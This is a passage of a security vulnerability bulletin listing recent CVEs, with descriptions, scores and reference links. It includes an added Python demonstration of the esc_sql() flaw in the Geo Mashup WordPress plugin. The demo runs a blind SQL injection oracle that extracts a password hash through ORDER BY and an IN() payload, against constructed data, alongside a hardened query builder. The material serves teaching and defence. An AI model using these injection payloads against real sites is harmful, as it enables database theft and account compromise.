https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_shortcodes.php#L434 https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_shortcodes.php#L434 https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_shortcodes.php#L36 https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_shortcodes.php#L36 |
| MikroTik--RouterOS | A vulnerability was identified in MikroTik RouterOS 6.49.8. This vulnerability affects the function ASN1_STRING_data in the library nova/lib/www/scep.p of the component SCEP Endpoint. The manipulation of the argument transactionID/messageType leads to out-of-bounds read. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 7.3 | CVE-2026-7668 | VDB-360804; MikroTik RouterOS SCEP Endpoint scep.p ASN1_STRING_data out-of-bounds VDB-360804; CTI Indicators (IOB, IOC, IOA) Submit #798623; MikroTik RouterOS 6.49.8 Out-of-Bounds Read https://github.com/ezio315/cve/issues/4 |
| Jinher--OA | A flaw has been found in Jinher OA 1.0. The affected element is an unknown function of the file /C6/JHSoft.Web.PlanSummarize/UserSel.aspx. This manipulation of the argument DeptIDList causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 7.3 | CVE-2026-7670 | VDB-360818; Jinher OA UserSel.aspx sql injection VDB-360818; CTI Indicators (IOB, IOC, TTP, IOA) Submit #799506; Jinhe OA V1.0 SQL Injection https://github.com/zzlln/cvecve/issues/1 |
| YunaiV--yudao-cloud | A security flaw has been discovered in YunaiV yudao-cloud up to 2026.01. This impacts the function getAccessToken of the file yudao-module-system-biz/src/main/java/io/github/ruoyi/common/oauth2/service/impl/OAuth2TokenServiceImpl.java. Performing a manipulation results in improper authentication. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7679 | VDB-360832; YunaiV yudao-cloud OAuth2TokenServiceImpl.java getAccessToken improper authentication VDB-360832; CTI Indicators (IOB, IOC, IOA) Submit #800866; YunaiV yudao-cloud up to 2026.01 Authentication Bypass by Primary Weakness https://github.com/9str0IL/CVE/issues/1 |
| Acrel Electrical--ECEMS Enterprise Microgrid Energy Efficiency Management System | A flaw has been found in Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System 1.3.0. The impacted element is an unknown function of the file /SubstationWEBV2/main/elecMaxMinAvgValue. Executing a manipulation of the argument fCircuitids can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7694 | VDB-360863; Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System elecMaxMinAvgValue sql injection VDB-360863; CTI Indicators (IOB, IOC, TTP, IOA) Submit #803271; Acrel Electric Co., Ltd. Enterprise Microgrid Energy Efficiency Management System (ECEMS) 1.3.0 SQL Injection https://ucn9h68n9289.feishu.cn/wiki/WZMewApmsiT3PMkCJfzcASEznOb |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability has been found in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0. This affects an unknown function of the file /SubstationWEBV2/main/elecMaxMinAvgValue. The manipulation of the argument fCircuitids leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7695 | VDB-360864; Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform elecMaxMinAvgValue sql injection VDB-360864; CTI Indicators (IOB, IOC, TTP, IOA) Submit #803275; Acrel Electric Co., Ltd. EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0 SQL Injection https://ucn9h68n9289.feishu.cn/wiki/QoXfwTAOiiYw2OkO0vAc7b7SnGg |
| Tiandy--Easy7 Integrated Management Platform | A vulnerability was identified in Tiandy Easy7 Integrated Management Platform 7.17.0. Affected by this vulnerability is an unknown functionality of the file /Easy7/rest/systemInfo/updateDbBackupInfo. Such manipulation of the argument week leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7698 | VDB-360867; Tiandy Easy7 Integrated Management Platform updateDbBackupInfo os command injection VDB-360867; CTI Indicators (IOB, IOC, TTP, IOA) Submit #804048; Tiandy Technologies Co., Ltd. Tiandy-Easy7 7.17.0 OS Command Injection https://ucn9h68n9289.feishu.cn/wiki/Yslcw7QqWiRjUZkCcvkcJI62n2c |
| AV Stumpfl--Pixera Two Media Server | A flaw has been found in AV Stumpfl Pixera Two Media Server up to 25.2 R2. Impacted is an unknown function of the component Websocket API. This manipulation causes code injection. The attack can be initiated remotely. The exploit has been published and may be used. Upgrading to version 25.2 R3 is recommended to address this issue. Upgrading the affected component is advised. | 2026-05-03 | 7.3 | CVE-2026-7703 | VDB-360872; AV Stumpfl Pixera Two Media Server Websocket API code injection VDB-360872; CTI Indicators (IOB, IOC, TTP) Submit #805274; AV Stumpfl Pixera Two Media Server < 25.2 R3 Remote Code Execution https://gist.github.com/TrebledJ/585a20525e45549f299d282233632608 https://help.pixera.one/changelogs-version-overviews/pixera-252-overview-changelog |
| YunaiV--yudao-cloud | A security flaw has been discovered in YunaiV yudao-cloud up to 3.8.0. This affects the function doFilterInternal of the file JwtAuthenticationTokenFilter.java of the component Ruoyi-Vue-Pro. Performing a manipulation of the argument mock-token results in improper authentication. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7710 | VDB-360886; YunaiV yudao-cloud Ruoyi-Vue-Pro JwtAuthenticationTokenFilter.java doFilterInternal improper authentication VDB-360886; CTI Indicators (IOB, IOC, IOA) Submit #806493; YunaiV yudao-cloud yudao-cloud up to 2026.01 Authentication Bypass by Primary Weakness https://github.com/9str0IL/CVE/issues/5 |
| n/a--MindsDB | A weakness has been identified in MindsDB up to 26.01. This impacts the function exec of the file mindsdb/integrations/handlers/byom_handler/proc_wrapper.py of the component Engine Handler. Executing a manipulation can lead to unrestricted upload. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7711 | VDB-360887; MindsDB Engine proc_wrapper.py exec unrestricted upload VDB-360887; CTI Indicators (IOB, IOC, TTP, IOA) Submit #806822; mindsdb <=26.01 Remote Code Execution https://github.com/nn0nkey/JD-Security-SHENYI-Team/blob/main/MindsDB_BYOM_RCE.md |
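
The three Geo Mashup entries above (CVE-2026-4060, CVE-2026-4061 and CVE-2026-4062) share one root cause: esc_sql() only neutralises quote characters, so a value that reaches an unquoted ORDER BY or IN(...) position is not protected by it at all. The script below is an added example written for this page, not code from the plugin or from Wordfence. Its geo_objects and wp_users tables, the stored hash and the helper names are constructed for the demo, and SQLite stands in for MySQL (unicode() and substr() here, where MySQL would use ASCII(), SUBSTRING() and, for the time-based variant the advisories describe, SLEEP()). It builds the query the vulnerable way, runs a quote-free boolean-blind oracle through the sort column, shows the same trick against IN(...), and then a hardened builder that allowlists the column name and binds integer ids:

```python
import sqlite3


def esc_sql(value: str) -> str:
    """Stand-in for WordPress esc_sql(): it only escapes quote characters
    (SQLite-style doubling here). A payload with no quotes comes back as-is."""
    return value.replace("'", "''")


def build_vulnerable(sort: str, object_ids: str) -> str:
    """The pattern the advisories describe: esc_sql() is applied, but the
    result lands in unquoted IN(...) and ORDER BY positions."""
    return (
        "SELECT object_id, label FROM geo_objects "
        f"WHERE object_id IN({esc_sql(object_ids)}) "
        f"ORDER BY {esc_sql(sort)}"
    )


SORT_ALLOWLIST = {"object_id", "label"}  # constructed list of sortable columns


def build_hardened(sort: str, object_ids: str):
    """Allowlist the sort column, cast every id to int, bind the ids.
    Raises ValueError for anything that is not a known column or an integer."""
    if sort not in SORT_ALLOWLIST:
        raise ValueError(f"rejected sort column: {sort!r}")
    ids = [int(part) for part in object_ids.split(",")]
    marks = ",".join("?" for _ in ids)
    sql = (
        "SELECT object_id, label FROM geo_objects "
        f"WHERE object_id IN({marks}) ORDER BY {sort}"
    )
    return sql, ids


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three map objects and one user hash."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE geo_objects(object_id INTEGER, label TEXT);"
        "INSERT INTO geo_objects VALUES (1,'a'),(2,'b'),(3,'c');"
        "CREATE TABLE wp_users(ID INTEGER, user_pass TEXT);"
        "INSERT INTO wp_users VALUES (1,'$P$BconstructedHash');"
    )
    return conn


def blind_oracle(conn, position: int, guess: int) -> bool:
    """One boolean-blind probe through the vulnerable ORDER BY: does byte
    `position` of the admin hash have code point `guess`? The payload flips
    the sort direction and contains no quote characters, so esc_sql() leaves
    it untouched."""
    payload = (
        "(CASE WHEN (SELECT unicode(substr(user_pass,%d,1)) FROM wp_users "
        "WHERE ID=1)=%d THEN object_id ELSE -object_id END)" % (position, guess)
    )
    rows = conn.execute(build_vulnerable(payload, "1,2,3")).fetchall()
    return rows[0][0] == 1  # ascending order only when the guess is right


def recover_prefix(conn, length: int) -> str:
    """Recover the first `length` bytes of the hash, one probe per guess."""
    out = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):
            if blind_oracle(conn, pos, code):
                out += chr(code)
                break
    return out


def in_clause_rows(conn) -> int:
    """The IN(...) context has the same weakness: a quote-free payload closes
    the list and comments out the rest of the statement."""
    sql = build_vulnerable("object_id", "0) OR 1=1 --")
    return len(conn.execute(sql).fetchall())


def hardened_rejects(sort: str, object_ids: str) -> bool:
    try:
        build_hardened(sort, object_ids)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked hash prefix:", recover_prefix(db, 3))
    print("rows returned via IN() injection:", in_clause_rows(db))
    print("hardened rejects ORDER BY payload:",
          hardened_rejects("(CASE WHEN 1=1 THEN object_id END)", "1"))
```

The two hardened controls are independent: the allowlist covers identifiers, which cannot be bound as parameters, and the int() cast plus placeholders cover the id list. In WordPress terms that is a sanitize_sort_arg()-style allowlist applied on every code path that reaches the query (the advisories note it was missing from render-map.php and the template tags), and $wpdb->prepare() with %d placeholders for the ids.
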

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| xenial--RSVG | librsvg2-bin 2.40.13 contains a buffer overflow vulnerability that allows local attackers to cause a denial of service by processing malformed SVG files. Attackers can supply crafted SVG input to the rsvg conversion tool to trigger a segmentation fault in the cairo image compositor. | 2026-04-29 | 6.2 | CVE-2018-25305 | ExploitDB-44491 VulnCheck Advisory: librsvg2-bin 2.40.13 Buffer Overflow via Malformed SVG |
| poppler-utils--PDFunite | PDFunite 0.41.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by processing malformed PDF files during merge operations. Attackers can trigger a segmentation fault in the XRef::getEntry function within libpoppler by providing a specially crafted PDF file to the pdfunite utility. | 2026-04-29 | 6.2 | CVE-2018-25306 | ExploitDB-44490 Official Product Homepage Product Reference VulnCheck Advisory: PDFunite 0.41.0 Buffer Overflow via Malformed PDF |
| VideoFlow Ltd.--VideoFlow Digital Video Protection | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows authenticated attackers to disclose arbitrary files by injecting path traversal sequences in the ID parameter. Attackers can submit requests to downloadsys.pl, download_xml.pl, download.pl, downloadmib.pl, or downloadFile.pl with directory traversal payloads to read sensitive system files like /etc/passwd. | 2026-04-29 | 6.5 | CVE-2018-25311 | ExploitDB-44386 Vulnerability Advisory VulnCheck Advisory: VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal 2.10 (X-Prototype-Version: 1.6.0.2) |
| LifeSize--ClearSea | LifeSize ClearSea 3.1.4 contains directory traversal vulnerabilities that allow authenticated attackers to download and upload arbitrary files by manipulating path parameters in the smartgui interface. Attackers can exploit the upload endpoint with directory traversal sequences to write files to arbitrary locations on the system, enabling remote code execution. | 2026-04-29 | 6.5 | CVE-2018-25312 | ExploitDB-44390 VulnCheck Advisory: LifeSize ClearSea 3.1.4 Directory Traversal Remote Code Execution |
| Sysgauge--SysGauge | SysGauge 4.5.18 contains a buffer overflow vulnerability in the proxy configuration handler that allows local attackers to cause a denial of service by supplying an oversized string. Attackers can inject a large payload through the Proxy Server Host Name field in the Options menu to crash the application. | 2026-04-29 | 6.2 | CVE-2018-25313 | ExploitDB-44372 VulnCheck Advisory: SysGauge 4.5.18 Local Denial of Service via Proxy Configuration |
| sebet--Go Fetch Jobs (for WP Job Manager) | Multiple plugins and/or themes for WordPress are vulnerable to Reflected Cross-Site Scripting via the url parameter in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-01 | 6.1 | CVE-2024-13362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d694491c-c0f5-4418-805a-db792ea4f712?source=cve https://plugins.trac.wordpress.org/browser/tablepress/trunk/libraries/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/widgets-on-pages/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/menu-image/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/simply-gallery-block/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/foobox-image-lightbox/tags/2.7.33/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/featured-images-for-rss-feeds/trunk/includes/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/wpide/tags/3.5.0/dist/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/add-search-to-menu/trunk/includes/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/master-addons/trunk/lib/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/foogallery/tags/2.4.27/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/internal-links/trunk/vendor/freemius/wordpress-sdk/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/interactive-geo-maps/tags/1.6.21/vendor/freemius/wordpress-sdk/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/independent-analytics/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/spotlight-social-photo-feeds/trunk/ui/freemius-pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/woo-permalink-manager/tags/2.3.11/assets/admin/js/pricing-page/freemius-pricing.js https://plugins.trac.wordpress.org/browser/pdf-poster/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/wp-meta-and-date-remover/tags/2.3.4/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/provider/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/changeset/3235286/ https://plugins.trac.wordpress.org/changeset/3249130/ https://plugins.trac.wordpress.org/changeset/3229060/ |
| WSO2--WSO2 Identity Server | The authentication endpoint accepts user-supplied input without enforcing expected validation constraints, leading to a lack of proper output encoding. This allows for the injection of malicious JavaScript payloads, enabling reflected cross-site scripting. An attacker can leverage this vulnerability to redirect the user's browser to a malicious website, modify the user interface of the web page, retrieve information from the browser, or cause other harmful actions. However, due to the protection of session-related cookies with the httpOnly flag, session hijacking is not possible. | 2026-04-29 | 6.1 | CVE-2025-10503 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4577/ |
| trustindex--Widgets for Social Photo Feed | The Widgets for Social Photo Feed plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the '/trustindex_feed_hook_instagram/troubleshooting' and '/trustindex_feed_hook_instagram/submit-data' REST API endpoints in all versions up to, and including, 1.8. This makes it possible for unauthenticated attackers to access and update plugin settings. | 2026-05-02 | 6.5 | CVE-2025-14726 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ab15fa8b-4072-435a-8a1c-ca6fd964a260?source=cve https://plugins.trac.wordpress.org/changeset/3513612/social-photo-feed-widget |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes DB2 Connect Server) could allow an authenticated user to cause a denial of service using a specially crafted SQL query due to improper allocation of system resources. | 2026-04-30 | 6.5 | CVE-2025-36122 | https://www.ibm.com/support/pages/node/7267642 |
| IBM--watsonx.data intelligence | IBM watsonx.data intelligence 5.2.0, 5.2.1, 5.3.0, 5.3.1 stores user credentials in plain text which can be read by a local user. | 2026-04-30 | 6.2 | CVE-2025-36335 | https://www.ibm.com/support/pages/node/7270923 |
| xlplugins--NextMove Lite Thank You Page for WooCommerce | The NextMove Lite - Thank You Page for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xlwcty_current_date' shortcode in all versions up to, and including, 2.23.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-02 | 6.4 | CVE-2026-0703 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8eab201-04a5-43df-bb9b-2964c50a1833?source=cve https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L79 https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L87 https://plugins.trac.wordpress.org/changeset/3482613/ |
| Zyxel--DX3300-T0 firmware | A post-authentication command injection vulnerability in the EasyMesh-related APIs of Zyxel DX3300-T0 firmware versions through 5.50(ABVY.7.1)C0 could allow an authenticated, adjacent attacker with administrator privileges to execute OS commands on an affected device. | 2026-04-28 | 6.8 | CVE-2026-0711 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-and-wireless-extenders-04-28-2026 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in data query logic. | 2026-04-30 | 6.5 | CVE-2026-1577 | https://www.ibm.com/support/pages/node/7269434 |
| Dell--Alienware Command Center (AWCC) | Dell Alienware Command Center (AWCC), versions prior to 6.13.8.0, contain an Execution with Unnecessary Privileges vulnerability in the AWCC. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2026-04-27 | 6.7 | CVE-2026-25908 | https://www.dell.com/support/kbdoc/en-us/000451018/dsa-2026-192-security-update-for-dell-alienware-command-center-6-x-for-multiple-vulnerabilities |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.0.0 to before version 4.14.4, Wazuh's server API brute-force protection for POST /security/user/authenticate can be bypassed by sending concurrent authentication requests. Although the configured threshold (max_login_attempts, default 50) is enforced correctly for sequential requests, a parallel burst allows significantly more failed login attempts to be processed before the IP block is applied. This enables an attacker to perform more password guesses than the configured policy intends (e.g., 100 attempts processed where 50 should be allowed). This issue has been patched in version 4.14.4. | 2026-04-29 | 6.5 | CVE-2026-26206 | https://github.com/wazuh/wazuh/security/advisories/GHSA-m2mr-xhhv-jx58 https://github.com/wazuh/wazuh/releases/tag/v4.14.4 |
| Dell--Dell/Alienware Purchased Apps | Dell/Alienware Purchased Apps, versions prior to 1.1.31.0, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Arbitrary File Write. | 2026-04-29 | 6.3 | CVE-2026-27105 | https://www.dell.com/support/kbdoc/en-us/000438321/dsa-2026-131-security-update-for-dell-alienware-purchased-apps-for-an-improper-link-resolution-before-file-access-vulnerability |
| Milesight--MS-Cxx63-PD | A command injection vulnerability exists in the web server of specific firmware versions of Milesight cameras. | 2026-04-27 | 6.8 | CVE-2026-32649 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.0.0 through 1.8.4 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2026-04-30 | 6.5 | CVE-2026-3340 | https://www.ibm.com/support/pages/node/7271096 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.8.4 and earlier could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. | 2026-04-30 | 6.5 | CVE-2026-3345 | https://www.ibm.com/support/pages/node/7271094 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.6.0 through 1.8.4 is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. | 2026-04-30 | 6.4 | CVE-2026-3346 | https://www.ibm.com/support/pages/node/7271095 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, the endpoint POST /user/invited does not validate any invite token, authentication header, or session. Any unauthenticated attacker can call this endpoint directly to create a fully active account and receive a valid JWT - even when the instance has existing users and signupRestricted is enabled. This bypass is distinct from the normal registration endpoint (POST /user) which enforces signupRestricted and sets active: false pending verification. This issue has been patched in version 5.0.0. | 2026-04-30 | 6.5 | CVE-2026-35514 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-g47g-v5cp-j8hp https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| n/a--V2Board | Cross-Site Scripting (XSS) in V2Board through 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing. | 2026-05-01 | 6.9 | CVE-2026-37503 | https://github.com/v2board/v2board https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 |
| redhat[.]com--gnutls | A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure. | 2026-04-30 | 6.5 | CVE-2026-3833 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-3833 RHBZ#2445763 https://gitlab.com/gnutls/gnutls/-/issues/1803 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew exposes a legacy dashboard route that returns a project's report data to any authenticated member of the same team, even when that user does not have access to the specific project. The route bypasses project-level authorization and returns the raw project object. As a result, a low-privileged same-team user can read another project's dashboard data and recover the project's stored report password from the response. This issue has been patched in version 5.0.0. | 2026-04-30 | 6.5 | CVE-2026-40603 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-6qr3-g75h-xm3f https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| nextlevelbuilder--ui-ux-pro-max-skill | A flaw has been found in nextlevelbuilder ui-ux-pro-max-skill up to 2.5.0. Affected by this vulnerability is the function _format_plugins of the file .claude/skills/ui-styling/scripts/tailwind_config_gen.py of the component Tailwind Config Generator. This manipulation causes code injection. The attack can be carried out remotely. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-01 | 6.3 | CVE-2026-7595 | VDB-360548 \| nextlevelbuilder ui-ux-pro-max-skill Tailwind Config Generator tailwind_config_gen.py _format_plugins code injection VDB-360548 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #805509 \| nextlevelbuilder ui-ux-pro-max-skill 2.5.0 Tailwind Config Generator Code Injection Leading to RCE https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/issues/246 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/pull/275 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/ |
| mem0ai--mem0 | A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vector_stores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 62dca096f9236010ca15fea9ba369ba740b86b7a. Applying a patch is the recommended action to fix this issue. | 2026-05-01 | 6.3 | CVE-2026-7597 | VDB-360550 \| mem0ai mem0 faiss.py pickle.dump deserialization VDB-360550 \| CTI Indicators (IOB, IOC, IOA) Submit #805562 \| Mem0 <= v1.0.11 Unsafe Deserialization https://github.com/mem0ai/mem0/issues/3778 https://github.com/mem0ai/mem0/pull/4833 https://github.com/mem0ai/mem0/commit/62dca096f9236010ca15fea9ba369ba740b86b7a https://github.com/mem0ai/mem0/ |
| Dayoooun--hwpx-mcp | A vulnerability was detected in Dayoooun hwpx-mcp 0.2.0. This affects the function save_document/export_to_text/export_to_html of the file mcp-server/src/index.ts of the component MCP Interface. Performing a manipulation of the argument output_path results in path traversal. Remote exploitation of the attack is possible. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-01 | 6.3 | CVE-2026-7599 | VDB-360556 \| Dayoooun hwpx-mcp MCP index.ts export_to_html path traversal VDB-360556 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #805608 \| Dayoooun hwpx-mcp Commit 87850fd67f0488d79fcbf061a29938cae914a15d Path Traversal https://github.com/Dayoooun/hwpx-mcp/issues/3 https://github.com/BruceJqs/public_exp/issues/28 https://github.com/Dayoooun/hwpx-mcp/ |
| ArtMin96--yii2-mcp-server | A flaw has been found in ArtMin96 yii2-mcp-server 1.0.2. This impacts the function yii_command_help/yii_execute_command of the file src/index.ts of the component MCP Interface. Executing a manipulation can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7600 | VDB-360557 \| ArtMin96 yii2-mcp-server MCP index.ts yii_execute_command os command injection VDB-360557 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #805613 \| ArtMin96 yii2-mcp-server 1.0.2 Command Injection https://github.com/ArtMin96/yii2-mcp-server/issues/3 https://github.com/BruceJqs/public_exp/issues/29 https://github.com/ArtMin96/yii2-mcp-server/ |
| n/a--JeecgBoot | A vulnerability was found in JeecgBoot up to 3.9.1. Affected by this vulnerability is an unknown functionality of the file /sys/fillRule/edit of the component FillRuleUtil Component. The manipulation of the argument ruleClass results in improper authorization. The attack may be performed from remote. The exploit has been made public and could be used. You should upgrade the affected component. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7602 | VDB-360559 \| JeecgBoot FillRuleUtil edit improper authorization VDB-360559 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #805706 \| jeecgboot JeecgBoot <= v3.9.1 Remote Code Execution https://github.com/jeecgboot/JeecgBoot/issues/9552 https://github.com/jeecgboot/JeecgBoot/issues/9552#issuecomment-4251391314 https://github.com/jeecgboot/JeecgBoot/ |
| n/a--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.1. Affected by this issue is the function checkPathTraversalBatch of the file FileDownloadUtils.jav of the component LoadFile Endpoint. This manipulation of the argument files causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The affected component should be upgraded. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7603 | VDB-360560 \| JeecgBoot LoadFile Endpoint FileDownloadUtils.jav checkPathTraversalBatch server-side request forgery VDB-360560 \| CTI Indicators (IOB, IOC, IOA) Submit #805707 \| jeecgboot JeecgBoot <= v3.9.1 SSRF https://github.com/jeecgboot/JeecgBoot/issues/9553 https://github.com/jeecgboot/JeecgBoot/issues/9553#issuecomment-4251745014 https://github.com/jeecgboot/JeecgBoot/ |
| n/a--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.1. This affects the function OpenApiController.add/OpenApiController.call of the file OpenApiController.java of the component OpenApi Service. Such manipulation of the argument originUrl database leads to server-side request forgery. It is possible to launch the attack remotely. The exploit is publicly available and might be used. It is suggested to upgrade the affected component. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7604 | VDB-360561 \| JeecgBoot OpenApi Service OpenApiController.java OpenApiController.call server-side request forgery VDB-360561 \| CTI Indicators (IOB, IOC, IOA) Submit #805708 \| jeecgboot JeecgBoot <= v3.9.1 SSRF https://github.com/jeecgboot/JeecgBoot/issues/9554 https://github.com/jeecgboot/JeecgBoot/issues/9554#issuecomment-4251574151 https://github.com/jeecgboot/JeecgBoot/ |
